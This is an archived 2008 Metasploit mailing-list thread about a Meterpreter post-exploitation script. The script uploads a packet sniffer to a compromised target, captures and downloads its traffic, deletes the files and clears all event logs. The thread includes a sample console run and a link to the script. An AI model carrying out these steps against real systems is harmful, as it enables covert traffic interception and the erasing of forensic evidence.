Metasploit mailing list archives
Meterpreter tcpdump script
From: basehat at gmail.com (base64)
Date: Thu, 13 Nov 2008 19:41:02 -0800
I would love to see see this implemented as a meterpreter extension, and have been meaning for some time to release something simliar written as an extension. If you could provide the packet sniffer sdk this would greatly help, and thanks again for your code! Best Regards, Adrian Castro basesixtyfour.com On Thu, Nov 13, 2008 at 6:45 PM, Jun Koi <junkoi2004 at gmail.com> wrote:
2008/11/13 Matteo Cantoni <matteo.cantoni at gmail.com>:Hi, ok ok I know this is a simple meterpreter script, but it seem works and I wrote it drinking some beers in a pub :) 1) clears all the event logs (if log_clear is 1) 2) upload tcpdump.exe (compiled with Packet Sniffer SDK, WinPCap is not required) on target with random name 3) create a dump file with random name 4) kill sniffer's process on target 5) download dump file from target 6) remove sniffer and dump from target 7) clears all the event logs (if log_clear is 1) meterpreter > run tcpdump [*] Clearing the all events logs! [*] Uploading executable OROPJ.exe to target! [*] Sniffing for 600 seconds! (interface 2, dump file ZZTCN.pcap) [*] Killing off OROPJ.exe after 600 seconds (pid 744) [*] Downloading dump file ZZTCN.pcap... [*] Removing OROPJ.exe and ZZTCN.pcap! [*] Clearing the all events logs! [*] Done! meterpreter > You could add also some tcpdump filters etc... - http://www.nothink.org/metasploit/tcpdump.rb -http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/PacketStuff-Network-Toolkit.shtml This is interesting, but still I find that weird: The whole point of meterpreter is to do everything in the memory and avoid writing anything to the disk. Meanwhile, your method does everything to destroy what meterpreter tries to do by dumping a lot of things to the disk! Is that a good idea, after all? Do I understand your idea correctly? j _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-- Best Regards, Adrian Castro Senior Software Engineer (310)765-0627 -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081113/f9df05db/attachment.htm>
Current thread:
- Meterpreter tcpdump script Matteo Cantoni (Nov 12)
- Meterpreter tcpdump script Matteo Cantoni (Nov 13)
- Meterpreter tcpdump script Jun Koi (Nov 13)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Thierry Zoller (Nov 14)
- Meterpreter tcpdump script base64 (Nov 13)
- Meterpreter tcpdump script Jerome Athias (Nov 14)
- Meterpreter tcpdump script Jun Koi (Nov 16)